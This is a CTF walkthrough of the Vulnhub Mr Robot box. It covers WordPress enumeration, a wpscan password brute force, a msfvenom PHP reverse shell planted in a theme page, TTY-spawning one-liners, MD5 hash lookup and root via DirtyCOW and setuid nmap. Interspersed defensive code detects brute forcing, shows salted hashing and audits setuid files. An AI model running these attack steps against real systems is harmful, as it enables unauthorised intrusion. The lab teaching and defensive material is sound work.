Find the machine here on Vulnhub
If you haven’t finished getting all three flags, don’t go any further. Do not ruin it for yourself!!
BUT, I have written this for the person who has no idea how to do it, or who wants new ideas.
So if you have downloaded this machine and are completely stuck, I hope this explains things well!
This is for beginners
In this walkthrough, I am using ParrotSec.
I usually use Kali, so hope the pretty terminal looks good in the screenshots!
Not much is needed. I start with a typical two terminals and a text editor for notes. What you use for notes, be it gedit, sublime, vim, nano, cherrytree or faraday, I don’t care, and neither should you. Don’t get tied up on the petty.
Whatever works, works!
So I have a few VMs running on my host, but on this network there is just ParrotSec and Mr Robot.
A quick word on hosts…
It doesn’t matter what you use as a host, honestly. Again, don’t get caught up with petty stuff.
First, let’s find the IP of the Attacking Machine.
ifconfig eth0 | grep inet
Now, find the target.
Two good options; I used the latter.
nmap -sn 192.168.88.1/24
netdiscover -i eth0 -r 192.168.88.1/24
Now we enumerate all the running services.
For that, I will run a basic nmap.
nmap -p- -sV 192.168.88.129
So we have a webserver. Let’s start.
Let’s look in a web browser.
That is some DAMN nice JS there!
Anyway, this gives us nothing, so it’s time to enumerate this port. There’s nikto, dirbuster, and so on. I’m going to use nikto. A word of warning: nikto is far from perfect. It breaks and comes up with huge amounts of false positives. But I still like it.
nikto --host 192.168.88.129
Of all the stuff it brought up, what I really care about is:
A – robots.txt (always check this)
B – It has WordPress, and the login is /wp-admin/
Well, that’s a giveaway; let’s grab them both with wget.
And let’s see our key.
And the second file is a wordlist. Before I go any further, let’s look at it.
tail is used to peek at its content, and wc to see how long it is.
858,000 lines; that’s enough. Let’s clean it up of duplicates.
Sort the file using sort, pipe it to uniq to remove the dupes, and redirect stdout to a new file.
sort fsocity.dic | uniq > small.dic
And now see what size it is.
Great, only 11,415 lines!
Assuming we need this, this is a great punishment for the lazy!
Run wpscan on it.
wpscan -e vp,vt -u 192.168.88.129
No point showing its whole printout, but the part that matters is:
[!] Title: All-in-One WP Migration <= 2.0.4 - Unauthenticated Database Export
    Reference: https://wpvulndb.com/vulnerabilities/7857
    Reference: http://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability
    Reference: https://www.rapid7.com/db/modules/auxiliary/gather/wp_all_in_one_migration_export
[i] Fixed in: 2.0.5
And it has a metasploit module, let’s try that!
Since we are firing up metasploit, we need to make sure postgresql is running.
Finding the module is first, so we will search for it.
search wp_all_in should be fine. And we have found it, let’s use it.
To view how to use this module.
We can see all the settings; all we need to change is the rhost, so let’s do that!
set rhost 192.168.88.129
(exploit also works)
And it looks like it was successful!!
Let’s check the file. Doing a quick ls -al shows the file is empty. This did not work! Let’s not waste time; let’s move on!
It is very common for WordPress to have weak, and I mean really weak, logins: admin:admin, admin:password, and so on.
And no way!!! How verbose is this error! It tells us whether the username we tried exists at all.
Let’s think along the social engineering route before we go the brute force route.
By that I mean the brute force route is getting a wordlist full of given names and common user names.
The social engineering route is: the machine is themed Mr Robot.
So we have robot, elliot, fsociety, and so on. Let’s do this manually to begin with!
And it’s a win!
Now, the password. Elliot wasn’t a nub, so let’s use that supplied password list.
wpscan -u 192.168.88.129 --username elliot --wordlist /root/vulnhub/mrrobot/small.dic
Okay, 2 minutes to go through this list. Think back to how big this file was. This could have taken nearly 80 times longer, 3 hours or so. And it would have taken that long because, look at the tail from above: the password it found is from near the bottom!
So we have Elliot’s password!
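The wpscan run above is a classic login brute force: thousands of POSTs to wp-login.php from one source in a couple of minutes, each failed attempt answered with a 200 (WordPress re-renders the form on failure and answers a successful login with a 302). That pattern is trivial to spot in the web server log. The following detector is an added example, not part of the original walkthrough or any tool it uses; the log lines are constructed here, and the threshold and window are arbitrary choices you would tune for your own site.

```python
"""Flag sources brute-forcing wp-login.php from combined-format access logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" format: ip ident user [ts] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def constructed_log():
    """Constructed sample lines (not from the box): one source hammering wp-login.php
    with 30 attempts in 30 seconds, plus a legitimate user who fails twice then succeeds."""
    base = datetime(2023, 10, 10, 13, 55, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(30):
        ts = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(
            f'192.168.88.200 - - [{ts}] "POST /wp-login.php HTTP/1.1" 200 3152 "-" "WPScan v3.8"'
        )
    for i, status in enumerate((200, 200, 302)):
        ts = (base + timedelta(minutes=5, seconds=20 * i)).strftime(TS_FMT)
        lines.append(
            f'192.168.88.50 - - [{ts}] "POST /wp-login.php HTTP/1.1" {status} 0 "-" "Mozilla/5.0"'
        )
    return lines


def parse_line(line):
    """Return the fields we care about as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: most failed wp-login POSTs seen inside any `window`} for every ip
    that reaches `threshold`. A 200 on POST /wp-login.php is a failed login."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if (rec and rec["method"] == "POST"
                and rec["path"].startswith("/wp-login.php") and rec["status"] == 200):
            per_ip[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start, best = 0, 0
        for end in range(len(stamps)):          # sliding window over sorted timestamps
            while stamps[end] - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    for ip, count in find_bruteforce(constructed_log()).items():
        print(f"{ip}: {count} failed wp-login POSTs within 60s")
```

Run against a real access.log by reading the file into `find_bruteforce`. Rate limiting or lockout on wp-login.php, and a login error that does not distinguish a bad username from a bad password, are the fixes that make both the username guessing and the wordlist run above far more expensive.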
WordPress just loves to give reverse shells!
There are so many ways.
Let’s look at a few!
First, we have meterpreter still open; it can do it entirely.
There is a module,
Have a read. I tried it, it didn’t work, I didn’t care and went to move on, but then thought making it work would be useful for you kiddies reading this, so.
Note: you need to know vi. I am not going to teach you vi, but it is EASY. Just learn the basics.
That failwith line we don’t want. It’s not that it’s a fault with the plugin; this is just a unique site, so for simplicity, just remove it.
In metasploit framework, type
reload followed by
Guess what, we have a meterpreter shell!
Again, there are so many ways of doing this, it’s crazy, so here’s another.
Using msfvenom, I create a reverse php shell.
Log in to WordPress, go to Appearance, Editor, and pick one; for this example, I used the 404 page.
Chuck the payload in there (note I changed the port)
Set up a reverse handler in metasploit as such.
set payload php/meterpreter/reverse_tcp
and all the settings as needed, remember,
and run it with
And browse to a random page to get a 404.
Google for php reverse shell, do something similar, edit a php page and put the payload in there. Instead of metasploit, use netcat.
nc -nlvp 4444 for example.
I won’t show an example of this, as the procedure is identical, and if anything, the metasploit method is more complex.
Now we have a shell, it’s time to look around. Let’s look where we are.
If you are using a meterpreter shell, just drop to shell using
Look around, have fun; there’s another little gift here too!
First, I look in home… habit, let’s just call it that!
Our second key, nice. Not that we can read it (remember, we are daemon, and this is owned by robot), but we can access the hash.
No one would ever do this, but anyway.
cat passwor*
robot:c3fcd3d76192e4007dfb496cca67e13b
It is an MD5 hash as claimed; let’s try Google, in case it’s in a rainbow table somewhere.
And it is!
Let’s log in as robot… but we can’t.
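Why a Google search recovers that password: an unsalted MD5 is one deterministic hash per candidate, so one precomputed table serves every user who ever stored a password that way. The snippet below is an added example, not code from the walkthrough; it shows the dictionary match that a rainbow table performs at scale next to what the file should have held instead, a salted, iterated PBKDF2 record, where the same password gives a different hash every time and no shared table applies. The wordlist and target hash are constructed here, not the box’s values.

```python
"""Unsalted MD5 versus a salted PBKDF2 record (added example, constructed values)."""
import hashlib
import hmac
import os


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def find_md5_preimage(target_hex, candidates):
    """Return the candidate whose unsalted MD5 equals target_hex, else None.
    This is all a rainbow table does: one cheap hash per word, reusable for every user."""
    target = target_hex.lower()
    for cand in candidates:
        if md5_hex(cand) == target:
            return cand
    return None


def pbkdf2_record(password, salt=None, iterations=200_000):
    """Hash a password for storage: random 16-byte salt, 200k iterations of HMAC-SHA256."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": digest.hex()}


def pbkdf2_verify(password, record):
    """Recompute with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(record["salt"]), record["iterations"]
    )
    return hmac.compare_digest(digest.hex(), record["hash"])


def salted_records_differ(password):
    """Same password stored twice yields two different records, yet both verify."""
    r1, r2 = pbkdf2_record(password), pbkdf2_record(password)
    return r1["hash"] != r2["hash"] and pbkdf2_verify(password, r1) and pbkdf2_verify(password, r2)


# Constructed demo values; the target stands in for a hash found in a world-readable file.
CONSTRUCTED_WORDLIST = ["letmein", "password123", "fsociety", "mrrobot"]
CONSTRUCTED_TARGET = md5_hex("fsociety")

if __name__ == "__main__":
    print("md5 match:", find_md5_preimage(CONSTRUCTED_TARGET, CONSTRUCTED_WORDLIST))
    print("pbkdf2 records differ and verify:", salted_records_differ("fsociety"))
```

The file on the box is doubly wrong: a password hash in a world-readable file in a home directory, and a hash function with no salt and no work factor. Fixing the hash format alone would already turn a one-second lookup into a per-user search.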
We need tty!
There are lots of ways again; my favorites are these:
python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'
So, let’s start from the top, until we get some luck!
And python delivered… on we go.
Using the new shell, let’s log in as robot.
And grab our little treasure!
Now, we need to get to root!
A quick hit at sudo said robot isn’t in the sudoers group.
So we need to find another way.
Let’s use the infamous DirtyCOW, since we know this kernel is vulnerable.
Search the exploit-db for the exploit.
Great, now let’s upload it to the machine using meterpreter.
ctrl+z to background the channel.
Get the local and remote directories where we want them.
Upload the file using
Go back to our channel using
channel -i 1 (Note, screenshot shows 0, that was my error, I had to re-run it)
Now we have got the file, we compile it as instructed.
Make it executable
chmod +x dcow
Log in as root
Do the root dance!
When this box was created, DirtyCOW was not known of, so there IS another way.
We look at processes using ps auxw, and we look for setuid bits on files…
This one was a winner, have a look!
find / -perm -4000 -type f 2>/dev/null
This is great because of nmap. Well… Maybe.
Older versions of nmap had an interactive mode; let’s try it.
Just follow the screenshot, yes, that easy!
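The find command above is exactly the audit a defender should run on their own hosts: list every setuid binary and compare it with what the distribution installs, so an unexpected one (a setuid nmap, or anything setuid under /home or /tmp) stands out before it becomes a privilege escalation path. This is an added example, not part of the walkthrough; the baseline set is an assumption standing in for a real allowlist you would build from a known-good image of your own system, and the entry list is constructed.

```python
"""Audit setuid binaries against a baseline (added example, constructed data)."""
import os
import stat

# Assumption: a typical Debian/Ubuntu set. Generate the real baseline from a clean install.
BASELINE = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/sudo",
}


def is_setuid_regular(mode):
    """True for a regular file with the setuid bit; same filter as find -perm -4000 -type f."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def unexpected_setuid(entries, baseline=BASELINE):
    """entries: iterable of (path, st_mode). Return sorted setuid paths not in the baseline."""
    return sorted(path for path, mode in entries
                  if is_setuid_regular(mode) and path not in baseline)


def walk_setuid(root="/", skip=("/proc", "/sys", "/dev")):
    """Live scan: yield (path, mode) for setuid regular files, not following symlinks."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:       # unreadable or vanished entry; skip rather than abort
                continue
            if is_setuid_regular(mode):
                yield path, mode


# Constructed entries: mode values are st_mode (file type bits plus permission bits).
CONSTRUCTED_ENTRIES = [
    ("/bin/su", 0o104755),                    # expected setuid binary
    ("/usr/bin/passwd", 0o104755),            # expected setuid binary
    ("/usr/local/bin/nmap", 0o104755),        # setuid nmap, as found on this box
    ("/usr/bin/vim", 0o100755),               # executable but not setuid
    ("/home/robot/.cache/helper", 0o104755),  # constructed: setuid file hidden in a home dir
    ("/usr/lib/somelink", 0o124755),          # symlink with the bit set; not a regular file
]

if __name__ == "__main__":
    for path in unexpected_setuid(walk_setuid()):
        print("unexpected setuid binary:", path)
```

Schedule it and diff the output against the previous run; a new entry is worth a ticket every time. Packaged tools such as nmap never need the setuid bit, and removing it (chmod u-s) closes the interactive-mode trick used for the last flag.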
That’s it, time for the last trophy.
Thanks for this machine Jason, very well thought out.
Hope you enjoyed the walkthrough.